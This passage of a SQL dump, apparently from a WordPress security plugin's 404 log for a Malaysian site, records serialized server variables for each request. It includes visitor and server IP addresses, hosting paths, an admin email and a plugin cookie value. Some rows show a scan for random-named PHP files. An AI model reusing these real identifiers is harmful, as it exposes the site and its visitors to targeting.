JuziBrowser\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"192.227.219.210\";s:11:\"REMOTE_PORT\";s:4:\"3394\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYzI8YobU@zjjbgWMCBqAgAAAQI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569507569.5496\";s:12:\"REQUEST_TIME\";s:10:\"1569507569\";}}','notice','2019-09-26 14:19:32','2019-09-26 14:19:29',35513384,37314408,'https://bintara.com.my/?page_id=18',1,0,'192.227.219.210'),(27092,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"317\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Publisher 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:2:\"10\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"D3FEB299-4BAA-4889-8705-2268821FE081\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYzOqOTQ4LALSh7k@hMNTgAAAIk\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"183.171.70.231\";s:11:\"REMOTE_PORT\";s:5:\"50338\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYzOqOTQ4LALSh7k@hMNTgAAAIk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569509033.0001\";s:12:\"REQUEST_TIME\";s:10:\"1569509033\";}}','notice','2019-09-26 14:43:55','2019-09-26 14:43:53',35985880,37787496,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'183.171.70.231'),(27093,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:129:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/D3117A87\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"212.233.130.198\";s:11:\"REMOTE_PORT\";s:5:\"37608\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYzyDFWB4BRJuHfwY@mILwAAAM8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569518092.2478\";s:12:\"REQUEST_TIME\";s:10:\"1569518092\";}}','notice','2019-09-26 17:14:57','2019-09-26 17:14:52',35603528,37405088,'https://bintara.com.my/?page_id=18',1,0,'212.233.130.198'),(27094,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:53:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:6:\"/a.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:169:\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:28:\"https://bintara.com.my/a.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:6:\"/a.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XY0F51WB4BRJuHfwY@mODAAAAMw\";s:29:\"REDIRECT_REDIRECT_nokeepalive\";s:1:\"1\";s:38:\"REDIRECT_REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:19:\"REDIRECT_SCRIPT_URI\";s:28:\"https://bintara.com.my/a.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:6:\"/a.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY0F51WB4BRJuHfwY@mODAAAAMw\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:13:\"104.218.63.75\";s:11:\"REMOTE_PORT\";s:5:\"39713\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:28:\"https://bintara.com.my/a.php\";s:10:\"SCRIPT_URL\";s:6:\"/a.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY0F51WB4BRJuHfwY@mODAAAAMw\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569523175.145\";s:12:\"REQUEST_TIME\";s:10:\"1569523175\";}}','notice','2019-09-26 18:39:38','2019-09-26 18:39:35',35631096,37447528,'https://bintara.com.my/a.php',1,0,'104.218.63.75'),(27095,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:54:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:10:\"/lpfi8.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=721aeba237547eca540a38b9a2ac8fa1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:169:\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:32:\"https://bintara.com.my/lpfi8.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:10:\"/lpfi8.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XY0F81WB4BRJuHfwY@mODwAAAM0\";s:29:\"REDIRECT_REDIRECT_nokeepalive\";s:1:\"1\";s:38:\"REDIRECT_REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:19:\"REDIRECT_SCRIPT_URI\";s:32:\"https://bintara.com.my/lpfi8.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:10:\"/lpfi8.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY0F81WB4BRJuHfwY@mODwAAAM0\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:13:\"104.218.63.75\";s:11:\"REMOTE_PORT\";s:5:\"42445\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:32:\"https://bintara.com.my/lpfi8.php\";s:10:\"SCRIPT_URL\";s:10:\"/lpfi8.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY0F81WB4BRJuHfwY@mODwAAAM0\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569523187.5131\";s:12:\"REQUEST_TIME\";s:10:\"1569523187\";}}','notice','2019-09-26 18:39:49','2019-09-26 18:39:48',35180144,36975760,'https://bintara.com.my/lpfi8.php',1,0,'104.218.63.75'),(27096,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:54:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/xfwpnyukyv.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=721aeba237547eca540a38b9a2ac8fa1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:169:\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/xfwpnyukyv.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:15:\"/xfwpnyukyv.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XY0GAFfhYxBkXBDDAIo9ZwAAAIQ\";s:29:\"REDIRECT_REDIRECT_nokeepalive\";s:1:\"1\";s:38:\"REDIRECT_REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/xfwpnyukyv.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/xfwpnyukyv.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY0GAFfhYxBkXBDDAIo9ZwAAAIQ\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:13:\"104.218.63.75\";s:11:\"REMOTE_PORT\";s:5:\"39029\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"https://bintara.com.my/xfwpnyukyv.php\";s:10:\"SCRIPT_URL\";s:15:\"/xfwpnyukyv.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY0GAFfhYxBkXBDDAIo9ZwAAAIQ\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569523200.6435\";s:12:\"REQUEST_TIME\";s:10:\"1569523200\";}}','notice','2019-09-26 18:40:03','2019-09-26 18:40:01',35179656,36981904,'https://bintara.com.my/xfwpnyukyv.php',1,0,'104.218.63.75'),(27097,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:54:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/murikha.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=721aeba237547eca540a38b9a2ac8fa1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:169:\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/murikha.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:12:\"/murikha.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XY0GCFWB4BRJuHfwY@mOGgAAAM8\";s:29:\"REDIRECT_REDIRECT_nokeepalive\";s:1:\"1\";s:38:\"REDIRECT_REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/murikha.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:12:\"/murikha.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY0GCFWB4BRJuHfwY@mOGgAAAM8\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:13:\"104.218.63.75\";s:11:\"REMOTE_PORT\";s:5:\"39869\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"https://bintara.com.my/murikha.php\";s:10:\"SCRIPT_URL\";s:12:\"/murikha.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY0GCFWB4BRJuHfwY@mOGgAAAM8\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569523208.9899\";s:12:\"REQUEST_TIME\";s:10:\"1569523208\";}}','notice','2019-09-26 18:40:10','2019-09-26 18:40:09',35182168,36985984,'https://bintara.com.my/murikha.php',1,0,'104.218.63.75'),(27098,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:53:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:9:\"/rdpl.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:169:\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:31:\"https://bintara.com.my/rdpl.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:9:\"/rdpl.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XY0GE1fhYxBkXBDDAIo9eQAAAJg\";s:29:\"REDIRECT_REDIRECT_nokeepalive\";s:1:\"1\";s:38:\"REDIRECT_REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:19:\"REDIRECT_SCRIPT_URI\";s:31:\"https://bintara.com.my/rdpl.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:9:\"/rdpl.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY0GE1fhYxBkXBDDAIo9eQAAAJg\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:13:\"104.218.63.75\";s:11:\"REMOTE_PORT\";s:5:\"42469\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:31:\"https://bintara.com.my/rdpl.php\";s:10:\"SCRIPT_URL\";s:9:\"/rdpl.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY0GE1fhYxBkXBDDAIo9eQAAAJg\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8